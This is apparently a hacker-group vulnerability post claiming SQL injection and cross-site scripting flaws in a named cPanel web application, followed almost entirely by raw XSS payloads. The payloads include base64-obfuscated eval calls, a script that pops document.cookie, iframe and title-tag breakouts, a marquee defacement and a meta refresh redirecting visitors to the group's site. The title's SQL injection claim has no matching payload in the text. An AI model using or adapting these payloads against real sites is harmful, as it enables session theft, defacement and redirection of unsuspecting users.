<------------------- header data start ------------------- >

#############################################################

# Application Name : cpanel Sql Inj &XSS Vuln. & Meta

# Vulnerable Type : Cross Site Scripting

# Author : CYBER WARRIOR - AaCcTt

# Target : https://applications.cpanel.com/
#############################################################

< ------------------- / header data end of ------------------- >

< -- bug code end of -- >


<h1>><img src=alert(’CYBER WARRIOR Bug Researchers AaCcTt’); <h1>><img onerror=eval(atob(’YWxlcnQoIkNZQkVSIFdBUlJJT1IgQnVnIFJlc2VhcmNoZXJzIEFhQ2NUdCIp’)) src=asd<h1>/**/# >>

><script>alert(’CYBER WARRIOR Bug Researchers AaCcTt’)</script>

><script>alert(document.cookie)</script>><marquee><h1>CYBER WARRIOR Bug Researchers AaCcTt</h1></marquee>

><iframe onload=alert(/CYBER WARRIOR Bug Researchers AaCcTt/)>

</TITLE><sCRipT>alert(CYBER WARRIOR Bug Researchers AaCcTt);</sCRipT><TITLE>



Meta

<meta http-equiv=refresh content=0;URL=http://www.cyber-warrior.org/>

< -- / bug code end of -- >